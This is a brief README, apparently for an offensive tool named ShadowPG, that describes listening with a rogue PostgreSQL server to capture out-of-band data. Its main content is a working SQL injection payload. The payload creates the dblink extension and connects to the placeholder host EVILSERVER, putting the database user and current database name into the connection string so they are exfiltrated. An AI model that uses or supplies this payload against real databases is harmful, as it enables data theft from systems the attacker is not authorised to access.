# ShadowPG

Listen processes on pgsql evil server, to get data from OOB:

Payload: CREATE EXTENSION dblink;SELECT dblink_connect(CONCAT('host=EVILSERVER user=',(SELECT user),' password=password dbname=',(SELECT current_database())))

![image.png](./image.png)
